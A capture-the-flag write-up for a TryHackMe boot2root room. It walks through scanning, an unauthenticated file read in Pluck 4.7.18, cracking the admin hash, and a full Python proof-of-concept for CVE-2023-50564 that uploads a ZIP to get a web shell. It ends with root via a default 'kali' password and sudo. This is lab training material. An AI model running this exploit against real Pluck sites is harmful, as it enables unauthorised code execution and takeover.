Boot2root

Room: https://tryhackme.com/r/room/workTM Difficulty: Medium

For this writeup I try to make it like a walkthrough each step for better understanding and what typically done when doing the boot2root challenges.

Step 1 - Scanning and enumeration.

When given the IP address, first thing to do is scanning which need to find any open port available in this machine and find the information each open port. Generally, use tool like nmap or can use any tool available for port scanning. Use this command to start scanning:

nmap -A -sC -sV -Pn 10.10.78.224

Options	Descriptions
A	enables aggressive scanning
sC	enables the use of default scripts in Nmap’s scripting engine (NSE)
sV	enables service version detection
Pn	skip the host discovery step and treat the target as if it is alive

Output:

Based on the output, there is only 2 open ports, ssh and http. Ignore the ssh first since there is no information about credential to login using ssh. In the result of nmap stated that there is file called robots.txt in the web running on http. Before that, since there is web running on the server, issues command gobuster to do directory enumeration to find any hidden directory in the web given.

gobuster dir -u http://10.10.78.224/ -w /usr/share/wordlists/dirb/common.txt

Options	Descriptions
dir	specify mode for directory brute-forcing
u	target URL to scan
w	wordlist to use

Output:

Step 2 - Gaining access

Based on the information gather earlier in scanning and enumeration, at directory enumeration there is 2 interesting directories with the status 200 which is admin.php and robots.txt. In robots.txt there nothing interesting in the directory /data/ and /docs/, so proceed to admin.php will result in login page which need to enter password only to login to admin page. This login page is basically preventing brute force attacks which implement rate limit of login attempt and need to wait another 5 minutes to make login attempt.

At this point with the information gather, this web is running on pluck 4.7.18 and try to find any vulnerability or exploit with that specific version which the result will be this CVE-2023-50564 where pluck 4.7.18 allows attackers to execute arbitrary code via uploading a crafted ZIP file. But for this to be executed need to be authenticated first, so leave this behind later.

Try to do more research if there any possible way or vulnerability available without any authentication which found this github proof of concept, https://github.com/pluck-cms/pluck/issues/122 where albums_getimage.php file uses the ?image= parameter without checking if it’s actually an image, letting attackers remotely read any file type on the server. But it doesn’t seem like path traversal (going backwards through directories) is possible.

Checking the based directory that are exposed to the vulnerability /data/settings/modules/albums/ find a very useful file that able to read the content using the POC which is admin_backup.php.

So, following the POC that provided earlier able to read the content of admin_backup.php which there is hashed password of the admin and when decrypt the hash using https://crackstation.net/ will result the password = hahaha.

Remember earlier the CVE-2023-50564? Since now able to reach the admin.php and try to gain reverse shell using this POC, https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC. Running the script will eventually connect to our kali and gain reverse shell. Below is the script:

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

login_url = "http://{ip}/login.php"
upload_url = "http://{ip}/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "hahaha","bogus": "","submit": "Log in"}

file_path = input("ZIP file path: ")

multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("payload.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)


if login_response.status_code == 200:
    print("Login account")

 
    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    
    if upload_response.status_code == 200:
        print("ZIP file download.")
    else:
        print("ZIP file download error. Response code:", upload_response.status_code)
else:
    print("Login problem. response code:", login_response.status_code)


rce_url="http://{ip}/data/modules/payload/shell.php"

rce=requests.get(rce_url)

print(rce.text)

By gaining the reverse shell, first make the shell more interactive which can refer to this, https://youtu.be/vOEO_6xfsdo?si=K8LaP7AeYLq7QUT6. Then try to retreive the user flag which found the user abu that contained user.txt in abu directory and read the file will retreive the flag.

Step 3 - Privilege escalation to become "root"

At this point, successfully switch user to abu using the same password retrieve earlier and find any misconfiguration or vulnerability using linpeas script. Nothing valuable was found other than these 3 users with console, which user kali really caught my eyes. What if the kali user using default password? (which is also kali). So by that try to log in as user kali and successfully log in.

Since kali are in sudo group, this can be used to bypass local restriction and switch to root using command below and finally can retrieve the root flag.

sudo /bin/bash

PS: I did not solve this challenge at the given time because I participated solo and tried to do other easier challenges first 😂